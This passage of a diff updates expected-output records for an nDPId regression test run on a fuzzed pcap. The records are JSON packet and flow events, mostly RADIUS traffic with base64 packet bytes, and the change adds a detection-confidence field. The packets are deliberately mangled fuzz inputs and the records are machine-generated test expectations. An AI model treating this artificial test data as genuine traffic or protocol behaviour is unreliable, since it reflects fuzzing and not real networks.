qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":129,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690}
 00723{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":130,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2296,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528997294874,"pkt":"ABRP+4rqcNuYVcUnCPhFAAEw\/yNAAPwRVFfG4hk1CgxAHgcUchABHADcAksBFFLEf\/kOKgAErzLPbpm7axIaCwAAV8gbBVNQQxpuAAABNxA040janeSai176IwGdu20qfHT6JdVX190nBVzQ8vbUeCsV1xduBdcl\/a+H+pp\/9\/XZ2p4RNITv9nAcFfSIQXySxypwJddtE1ldHXfDo7SxndAJGg66ub4EawJGyutGrkBcdNZ\/YktYATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":130,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2296}
 01290{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":131,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528997299762,"pkt":"AKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00183{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":131,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690}
-00671{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1528996996259,"flow_last_seen":1528997300431,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":22273,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1528997307038,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997307038,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00697{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1528996996259,"flow_last_seen":1528997300431,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":22273,"flow_avg_l4_payload_len":464,"midstream":0,"ts_msec":1528997307038,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997307038,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01289{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"ts_msec":1528997307038,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQRLAP8RAAAKDEAexpYZNXIQBxQCxwAAAU4Cv5wdq9spC4sVMXMqpc65j64aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMwNwZbIqW6ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BCblJ0d29yay5vcmdZAxB+CDFjaXNjL4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYyAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAPYmZiM2E1SjI1YiwgNWIyMmE1YjMvZjA6Nyk6NjA6ZDE6N2Q6MzcvMjJqBAasFAESIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABOqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":135,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":711}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1528997311323,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997311323,"pkt":"AAAMB6xAABRP+4rqCABFAALbIQZAAP8RAAAKDEAexuAZNXIQBxQCxwAAAVACv44mJt0CcxbAbqYZaENsgGMaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfIdQlXSVNQUmMwGgkAADghDQMxNwZbIqW\/ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLk1jYzMxMS4zZ3BwbmV0d29ydi5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYmZiM2E1MjI1YiwgNXIyMmE1YjMvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIyBAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwNbGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQIAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGxFBKmVASgNwWy5gYQ7uGHIUIDaTD8g=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00627{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":139,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997311323,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1528997257160,"flow_last_seen":1528997259951,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":511,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1528997257160,"flow_last_seen":1528997259951,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":511,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00595{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00668{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
-00667{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":143,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997394692,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
